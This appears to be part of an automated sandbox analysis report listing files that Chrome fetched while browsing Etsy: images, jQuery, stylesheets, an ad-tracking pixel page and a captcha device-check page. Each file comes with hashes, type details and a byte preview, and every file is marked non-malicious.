                                                                                                                                                                              SHA-512:250C0E1AE790D916C73481271AB79B1F65689AAA392344BE62C383526E9264F1670E5BC78BD5575EE9BD4AE7865E5BB3AA64086F358025FF0AA6CC8190A962A0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/21204286/c/1284/1284/0/420/il/531e9f/5248615643/il_300x300.5248615643_jv8f.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................P....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................P.mdat....."%r....4 2........!@../3@..K.r\......'1.q..x0`.Mk~i5.$ClS.......{.....t.2..A.....".\.d.b..................`.]o...M.S}..`&.......lrG..{e.$:.....k..X.U..P...D..)..t...B.f.g..{X]......"u.$.zC..)*b..<.M.>....../...X.....$.-.."c....B...... Z R.%...v....4.....-..........B..jk@..3.....'F..../U3.j5..i.3.`.....1m`P.PG........x#?..T.$..X......7...]!*. ..}.b]x..}.{.L.L.@.B.;..(...zM....7....P..3..<.l.$..k.)..3.=.s'q]#.L.V....\f<."s?.j...e....{..wt..G...; .]..R..4utU_xK.|3.C........#.N..Of..............`.u..`D..r..l..?...U.%...W?.......Mt..p.$...|<O.k1q.E..a...i./r......../.Ab $V...e!.q~gP\. .D.s.d,..#UUe..i 9.C.U...b..e.OK......y...khD...t.%H.~M(f..N..... ...HE....g.......1..~....S85V.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):38582
                                                                                                                                                                              Entropy (8bit):7.993688470167176
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4A1A26811F3C11B1F00ACBC44676A2D4
                                                                                                                                                                              SHA1:BCF65109B3F4719FC5F809515E2131F22E92DCFF
                                                                                                                                                                              SHA-256:04B552295804E9AC351C3AF489D17F5306A048F26C1F7F6365C4EE4F8ABBCE22
                                                                                                                                                                              SHA-512:D389D4EB95D1B2DC42913E99778A35EB6CF7983D9E5C4DDE74EB21AB99B8CCF7EC6CC7CE6AB34FB58AE8171F526D6822BABF674AEB980554BCE433500C17917B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6227952/r/il/fd0bc0/4404782099/il_600x600.4404782099_rv3x.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.... ...A@..,....z.1v4.....b.x.s-.4..<...}...F."T....F...\..]'.+.....*6.$..C.t...,I.Ln_f..LY-/...............Ys?.....=4...N.V.~.....W..[....W..(..n.k..h..&..ND..O,.....>#........n..I..bx..Y...?(..._...tF.==......M.d..-..i..g=,..|}ly..#......wk.v`...M.R.....;..0..4.......K...Y..-.i&..@DD.FT...gZ._.=l...$....}jt..[<[s"c......w.>..a.d...m^e(..ZndS.Z..p..w=o.F?.gU.......n\`.M....j.Z...+*.3..........8..)C..l.W....p..q..W9.W.._0.]..$.j.r....6Q2. y.2.........X.;...F..G.j..3v.%.+....aF...'.....Js..g..hD...{.....g...`....k.|1.*..#....y........fp.`g.....({(....&..........Nm.L.).g....hOYEK....annU.....(...... ...q.......*Xr......Q..#.f.."=2.>..eUQ*....F5......T..2m.....9t...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):11378
                                                                                                                                                                              Entropy (8bit):7.970535419621585
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:17D9F863F5EB35FE2D8BCB332AE56BE4
                                                                                                                                                                              SHA1:FB15CF88ED0CA4578891532F7D941583CD4E280E
                                                                                                                                                                              SHA-256:975A6AE282F5EDC45291CCC0E603252900FA8B742ECD09125C297FBC458FD5E5
                                                                                                                                                                              SHA-512:AC059A290EA7FFD0F76D3C6597FB9AEDB0677790CAD3EF261CD115AFB65B3CFBB76EF209C6FC05C178CFD7CD46349316AB759729E7D800C99D013A4A0B8F67F1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/23133928/r/il/eafe2f/2515037625/il_340x270.2515037625_9mk8.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................+d...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................+lmdat....."*p...h4 2.V.p.E.Q@...n..*fS..%....{..?....G.3...>..W....@.2?..C5J..x..LGv.\.d.P.QA.R.. _.*T..Oe..;...3.e......Q.....t .........d...k...*P....5h..!.5o(w...#..6SI[.}.A.....[.X...cc...J.......#.~....d.+/.n...........L..bJ...J#...!8..Y.1....q..j....G.7.l[.O...Z...........h'..L9....x+.{y.s.oF>.1J..h.........5F........j..L....)..1.`.l.c06.Q0&rn..~F..k.*F.f.'O.B.J*Wq..R.....0...T....>J.+W.<<.M^....!.R.N.P.q0p!;i...F{`.2.3Q.......t.........~.....E.n...N..W....ue ..Pn<..b..G.D2.*....cc .....[.4..K.I68=9..-;i~.q.lT.c_...k..S_..;.[.J.W3&...Q.w.~..!.:.....p....$...U....iu?.w&...ZZ]...Eg-...L.,.L........q.n...O+v..:......e[.0.Ql.....tn...en.......@.R.......P.1a.!...V/..+...]'..[.A..Wb.|.......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):96385
                                                                                                                                                                              Entropy (8bit):7.978961252791931
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:760D2B495A4A4ACF5B127B7A93251597
                                                                                                                                                                              SHA1:4A8AC388B219635B93194C5648A7C21C78D91449
                                                                                                                                                                              SHA-256:455E36A117C04BE99F03776A3825E0E6C8D3D7958B54BA6628D283FE178BBC0D
                                                                                                                                                                              SHA-512:28697DF976CF41E8FA8FB512E1BFA58663EE90BB2A68193F6B4941EE0835A1B8E041B72184636EEE7E19A6B9787EB175BAA10468346270D7E2E521748C58759E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................I........................!..1A."Qaq...#2B...R...$3br.C....4Scs..%D&...................................:.......................!1.A"Qaq..2...#B....R3br.....$C..............?..9FA.I..@.w.8#`..R.z.zR.*....+....l...A.*C......".`....-.i..e.GoS..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):77510
                                                                                                                                                                              Entropy (8bit):7.994631228098925
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8D2D624AF5B32022DD15AEA1C1649062
                                                                                                                                                                              SHA1:D392FF876E9C165FB95D0CB40632705CA7CEAA7A
                                                                                                                                                                              SHA-256:585F163BEB4990D95320149DBA7B2BB034BB0FF99F520D040C30900D0C34F2FA
                                                                                                                                                                              SHA-512:AFE5841345FB2DC5060503536C6D0BCEC33FF90452D1B097903FBF4D072C73A39D2AC974A8D2533B536F28A36243A340D977A298C43D7FA0447CA3CDC68F496F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/7462887/r/il/0cd4f7/6181068970/il_600x600.6181068970_ikwz.jpg
                                                                                                                                                                              Preview:RIFF....WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .,..0....*X.X.>U$.D..!#...pp..M...wTw....~..[...y_...x..w.7...|g./6........#...?..................7.....?z..?..............g./m/U.A.......p>......................>..D.7....G........._......?....o...?.....o.O......{.../.?..a.I~...._}&..s...o`_o>..;......R.Q.).....'...~....>........_.?....V......9.[...D...G.....7.'..._......^..K..yY.g..Vks.q....LW...9L.4....(M.R]...'k.X.M....tD.)m<...Y...D`=\(.ie.e...."nD....'.Pk-...\..T..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (30483), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):30483
                                                                                                                                                                              Entropy (8bit):4.96084732228466
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:03CDADBF9AE59E8E9F2599425CDDF2D4
                                                                                                                                                                              SHA1:397B28B1A923769BBCFE4451056ABD109E1AD0CD
                                                                                                                                                                              SHA-256:9E1DE9C2541E59455407EDBB95A83538A9EC3B1CA4FC3D6DC41D120184C0323F
                                                                                                                                                                              SHA-512:826401B38E2D9D64ED43BFBFD6718D8D522E6001B118040BDC75F5DCF4A6DCEE6FD32C3CF7807B8CD5F17E95622A0BBF50A562226EB6F3C6E46C21D3D55AFF1C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/__modules__ListingPage__src__/Recommendations/CombinedAdsAndRecs/ads_row_header.74cb1c37c4995e,web-toolkit-v2/modules/buttons/buttons.74cb1c37c4995e,__modules__ListingPage__src__/SuggestedPersonas/styles.74cb1c37c4995e,web-toolkit-v2/modules/typography/typography-marketing.74cb1c37c4995e,__modules__GiftMode__src__/Web/Common/Elements/MinimalPersonaCard/Styles.74cb1c37c4995e,__modules__GiftMode__src__/Web/Common/GiftModeColors.74cb1c37c4995e.css?variant=sasquatch"
                                                                                                                                                                              Preview:@media only screen and (min-width:0) and (max-width:639px){.less-bottom-margin-sm-down{margin-bottom:18px!important}}@media only screen and (min-width:640px){.less-bottom-margin-md-up{margin-bottom:24px!important}}@media only screen and (min-width:900px){.breakpoint-specific-flex-display-lg{display:flex!important}}@media only screen and (min-width:0) and (max-width:639px){.breakpoint-specific-flex-display-sm{display:flex!important}}.wt-btn{--wt-btn-bg-color:unset;--wt-btn-bg-color-hover:unset;--wt-btn-border-color:unset;--wt-btn-border-color-hover:unset;--wt-btn-text-color:unset;--wt-btn-text-color-hover:unset;--wt-btn-scale:scaleX(1)scaleY(1)perspective(1px);--wt-btn-scale-hover:scaleX(1.015)scaleY(1.035)perspective(1px);--wt-btn-scale-active:scaleX(1)scaleY(1)perspective(1px);color:var(--wt-btn-text-color);font:inherit;cursor:pointer;text-align:center;-webkit-tap-highlight-color:#0000;-webkit-appearance:none;vertical-align:middle;z-index:10;background:0 0;border:none;border-radius:24
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1611
                                                                                                                                                                              Entropy (8bit):6.64089621607803
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4FDDEA84C27491A2AAE5E2B9DA95C288
                                                                                                                                                                              SHA1:73708903399072AD49D2D14F8CBD71E68615EED0
                                                                                                                                                                              SHA-256:F1296375A9FA983A25C139A89DEB0BF7A67F33A78EE6D39C8E1B52B96AB27638
                                                                                                                                                                              SHA-512:EA67FEF090FF23B04AC325EF68A9CA1FF4216655F39692CA981045B355054C1234A47DB773CAD2B322FE47E2376C8C4F468BF32D1AEE301F1FEBE4ED78014D7C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......2.2.."........................................+...........................!1AQ."..#a.q................................&.........................!1.AQ..R#2.............?..Y%.&.I#X....4kh..c51...2.~.#W.T.TQ.......9k.t-.U.O(|l.q.#q...........MY.E....sL.(......uU+....>Jx.....0.B....i....<..~
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (759)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1386
                                                                                                                                                                              Entropy (8bit):5.577753253954568
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3DC35FDDBD66201816DF6E980B2DAB10
                                                                                                                                                                              SHA1:8584ACC8290BC923461377788279EECD3B651585
                                                                                                                                                                              SHA-256:62AA3D2902B24FB533C2722DC1376CC0CA2788FBB133FF12EE4988A00F2E0D32
                                                                                                                                                                              SHA-512:471A29C50DED4767045182D28EAF921B31A78171063E4640B616BEF3CCEEB2731E94D48904DF520B3E6C648BCD0BCA8E5F6731FC5FFBAC91678CDF8D255887C3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://8666735.fls.doubleclick.net/activityi;dc_pre=CI-N4aedn4kDFTXZEQgdVQoEBg;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script src="https://js.adsrvr.org/up_loader.1.1.0.js" type="text/javascript"></script>. <script type="text/javascript">. ttd_dom_ready( function() {. if (typeof TTDUniversalPixelApi === 'function') {. var universalPixelApi = new TTDUniversalPixelApi();. universalPixelApi.init("r09jr34", ["c6e9qnb"], "https://insight.adsrvr.org/track/up");. }. });. </script><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CI-N4aedn4kDFTXZEQgdVQoEBg;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=*;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;g
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):62333
                                                                                                                                                                              Entropy (8bit):7.962010966042149
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8EC8A152915DA0159E199D5879A0378B
                                                                                                                                                                              SHA1:2E24E3FDFBD8EFFE2904E410C2BB779F3C468F3A
                                                                                                                                                                              SHA-256:4FE2E599D6EAE7F6EB4F7E7A92AA248276322424C46F370EAF6757A8964DF9BA
                                                                                                                                                                              SHA-512:3F3430DCCEE6D77C295A0B6E0E236FCC4CDAEB476708C189FB3EB19ED025A90EBEEAB09D9D934BCEDC8C87CD8C93A75B13F52DEAEA826A4DF8CB20E199155ECA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................K......................!..1.A."Qa.2q..B..#R...br...3....$..CSc..4s.%DU....................................5......................!1A..Q.a."2q.......#3B..b................?..tb(..(L...+..Fh.h..(.."b...Ph.Pg.T...2dQ.~Fh.v.b.H.......A.X4....@)....`
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (4779), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4779
                                                                                                                                                                              Entropy (8bit):5.432966155708213
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7487394C252ED25468A2037369D345E5
                                                                                                                                                                              SHA1:77E52C98B573C8DAD4542BA35D98A213B004D8AD
                                                                                                                                                                              SHA-256:919293E56B6A814A84A579B014F63A2423B0419C418494DA7BAA7C0C5893CDE1
                                                                                                                                                                              SHA-512:D60AA3C9FB3E33573819398EF86C8813AABE2B2932C65637D9BBF53860B760EA917E2FDA41C1B2EEF0D89EB9AC4495FD76E521B4B472D6C126770EAFBAED1BAD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:!function(t){var i={};function r(n){var e;return(i[n]||(e=i[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,r),e.l=!0,e)).exports}r.m=t,r.c=i,r.d=function(n,e,t){r.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},r.t=function(e,n){if(1&n&&(e=r(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(r.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)r.d(t,i,function(n){return e[n]}.bind(null,i));return t},r.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return r.d(e,"a",e),e},r.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},r.p="",r(r.s=2)}([function(n,e){function t(n,e){return function(n){if(Array.isArray(n))return n}(n)||function(n,e){var t=null==n?null:"undefined"!=typ
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):4.158251840403777
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:543A71A8C7974F48D824113F6B4CDC6B
                                                                                                                                                                              SHA1:7934BE41225252CD95C9E1A8107BBFB5F6D6E693
                                                                                                                                                                              SHA-256:C76D000B52B8466B3C61573ADCFDD322BD995B956FD2551D23FFFECFF8F8DE5F
                                                                                                                                                                              SHA-512:4615853A2E1F426E67338C807FDC693D89BCD124CB2DB0AE8DD1BBE743D0674C69D3E36A6B7187D8C287A54A141180FFCB86841735AF305E8C0107E14EA8CBB9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:GIF89a.............!..www.interlogy.com.!.......,...........L..;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16347
                                                                                                                                                                              Entropy (8bit):7.926282712928493
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A2CECFB8EABC777FE53C4AA7AC0ED18B
                                                                                                                                                                              SHA1:4830027D52FA697199D7216A431F5474D3A01DB9
                                                                                                                                                                              SHA-256:3D29086150A327106C347A623ECD73F44BE8F598FA6A457D8F752D16EC90A729
                                                                                                                                                                              SHA-512:16FA56E1D79F9EA84A57C252E12C3B0A64608A43EE07C04D47A620A2F514C37AC6AC8D0909847AD78B1485DF8B126472215265979DED09F389112B804E63D34B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,..".........................................D.........................!1.AQ."aq...2B..#...3Rb...Cr.$%S.&c....................................5.......................!.1AQ."aq..2B..#R...Cb..cr..............?...;#."......@.4....%*.$j..D,.HH#..I.... .Hh .. IGtj..JEd,...D...%.E&.`>..l..k..Rz+
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17727
                                                                                                                                                                              Entropy (8bit):7.932333632604139
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:753E239D6C927C77F5B2F33C06141F12
                                                                                                                                                                              SHA1:32E24ADABE2F01E8D49F3C5160899F90EBD81004
                                                                                                                                                                              SHA-256:6DE9EDD35A4D407BCA5EA0D4048853E11C50482177D2103EF70B49778A0257A5
                                                                                                                                                                              SHA-512:6EEAFD3FCA43D1473D767D72F2D37A1B479808E2FF078804520C04703692053314A29D1A5879023AED36B72F3BB8C0653119889752648A39F3EF679CCAED532B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................D........................!.1A.."Qaq2....B...#Rr..3.b....$CS..T..c..................................:........................!1.AQa..q.."2.BR..CSbr....#$3...............?....(n:......C...8.@.Z.....OL..H07.6......L....*..:.E.Oj>....q.R.......m.9nh.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (59830)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):253494
                                                                                                                                                                              Entropy (8bit):4.882587691999953
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D6544313910EC94F8618396FB6A2214F
                                                                                                                                                                              SHA1:25BCD58F202918AC6D0921AE96A705D52AF40A19
                                                                                                                                                                              SHA-256:DACE0B5021C375BC2B6F12B2D034537D998BA52CA398D36F17185D2A851BA703
                                                                                                                                                                              SHA-512:C67C1DC57A2B681EE2B4A15EBEFA0DD00CFDCC3F4FED142E22EDE1A61E9492A40DE6EAD728A428D9085185B3D66115B3EFCF28B0598414A9EF63B0D84371A293
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://geo.captcha-delivery.com/interstitial/?initialCid=AHrlqAAAAAMAxzXj_13Xm4IAm17xug%3D%3D&hash=D013AA612AB2224D03B2318D0F5B19&cid=J9jCRaNEokpRmfELA6hpD5jxeNoH8OR6y3xpGAnarUNOISV_7W43NeU9djpMruBAsMXw0X92YkSsY09UXfKvTPW~_rDtCKlW3qXrl_EUUJ5m6JONe3dvEK7JL189wZBR&referer=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&s=45977&b=1301560&dm=cd
                                                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en">..<head>. <meta charset="UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <meta name="robots" content="noindex">. <title>Device check. </title>.. <link href="https://static.captcha-delivery.com/common/fonts/roboto/font-face.css" rel="stylesheet">. <link rel="stylesheet" href="https://static.captcha-delivery.com/captcha/assets/tpl/device-check/index.css" />... <style>. /* General font handling */. *, *::before, *::after {. font-family : Roboto, Verdana, Arial;. font-weight : 400;. color : #000000;. }.. :root {. --device-check-spinner-color-1: #17cdda;. --device-check-spinner-color-2: #17bbf4;.}.@media (prefers-color-scheme: dark) {. .dd-etsy-device-check *:not(.device-check__spinner-1):not(.device-check__spinner-2){
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
